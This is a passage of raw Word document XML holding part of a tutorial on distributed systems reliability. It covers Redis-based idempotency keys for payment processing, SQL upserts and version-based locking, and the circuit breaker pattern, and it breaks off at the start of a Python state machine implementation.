    <w:p w14:paraId="5001B398" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53B3D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Storage of idempotency keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622664D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Redis: SETNX key result EX 86400 (24 hour TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F6848F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Database: idempotency_keys table with (key, result, expires_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D484B9A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29890AEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974A726" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def process_payment(request, idempotency_key: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D251C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      cached = redis.get(f"idempotency:{idempotency_key}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C587E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      if cached:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFA7B02" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return json.loads(cached)  # return cached result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DE560" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65720F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      # Lock to prevent concurrent requests with same key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D58FA7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      with redis.lock(f"lock:{idempotency_key}", timeout=30):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4CA38" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        # Double-check after acquiring lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE83EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        cached = redis.get(f"idempotency:{idempotency_key}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B184D81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        if cached:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6213FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          return json.loads(cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5F813" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412AD3F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        result = actually_process_payment(request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23123CF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        redis.setex(f"idempotency:{idempotency_key}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8A25A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    86400,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38FE07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    json.dumps(result))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876609B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00650323" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E360D9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Stripe's idempotency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB506D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Every API request can include Idempotency-Key header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD46748" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stripe stores response for 24 hours per key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B14B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Client safely retries on network failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5947B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stripe returns same response on retry (charge not created twice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E05C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F708DFE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Database-level idempotency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0415ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  INSERT with ON CONFLICT DO NOTHING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9F7F8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    INSERT INTO events (id, data) VALUES (uuid, payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663ABAE2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ON CONFLICT (id) DO NOTHING;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76206F7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Safe to retry: duplicate inserts silently ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561936E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61C365" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  INSERT with ON CONFLICT DO UPDATE (upsert):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091CAC4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    INSERT INTO subscriptions (user_id, plan, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C8936" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    VALUES ($1, $2, 'active')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8A573" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ON CONFLICT (user_id) DO UPDATE SET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FF588" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      plan = EXCLUDED.plan, status = EXCLUDED.status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB4A8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Idempotent: multiple inserts with same user_id → same final state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036815DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B5E74" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Optimistic locking (prevent lost updates):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403778E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    SELECT version FROM items WHERE id = $1 FOR UPDATE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E869C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    UPDATE items SET quantity = $2, version = version + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4EEA9B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    WHERE id = $1 AND version = $3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B37A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E267D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If UPDATE affects 0 rows: conflict → retry with fresh read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5A3A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Prevents: concurrent updates overwriting each other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5418A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="37033B7D">
          <v:rect id="_x0000_i6442" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141C5F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Circuit Breakers — Preventing Cascading Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354304E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Cascading Failure Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDF42E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D6C5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Scenario: service A depends on service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D31C1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  B becomes slow (100× normal latency, but still responds eventually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E9F600" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  A sends requests to B normally (no circuit breaker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F2EB3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF548F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  B's latency: 10 seconds instead of 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5BA905" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D70120F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  A's request handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71CEAC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Each request to A: blocks for 10 seconds waiting for B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1274D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    A has 100 threads (thread pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18A269" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    At 100 requests/second to A: 100 req/s × 10s latency = 1,000 in-flight requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B753B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Thread pool: 100 threads → 900 requests queuing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D1F2B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Queue: fills up → requests rejected (thread pool exhausted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70517A14" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    A: effectively down (rejecting 90% of requests due to B's slowness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C539B8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944036A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Meanwhile: C depends on A, D depends on C...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143BC7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    All services become degraded because B is slow (not even down)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA321F4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A4640" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  This is cascading failure: local slowness propagates to entire system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945D4B6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="66FE28F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Circuit breaker prevents cascading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75670A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Analogy: electrical circuit breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FEBB09" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Normal: current flows (requests pass through)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859F7EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Overload: breaker trips (requests fail fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8906A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Reset: breaker tries again (test if downstream recovered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1206A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D563FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>States:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369C6CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CLOSED (normal operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCF49A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Requests pass through to downstream service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72408618" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Monitor: success/failure rate over sliding window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306531DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536E1E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  OPEN (failure detected):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584FCA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Requests fail immediately (without calling downstream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCC904" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Downstream gets recovery time (no traffic hitting it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16186317" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Caller gets fast failure (instead of waiting for timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E2B84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Timer: wait N seconds before trying to close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF84FB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671683AE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  HALF-OPEN (testing recovery):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C69B80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Allow one request through (probe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F486FEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If success: → CLOSED (downstream recovered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA4BDB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If failure: → OPEN again (downstream still down)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D0751" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaker implementation — full state machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EAACE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB8EC1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA06DEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A65259" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B20915" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>from collections import deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231341EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="34D4C5AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>class State(Enum):</w:t>
      </w:r>
    </w:p>
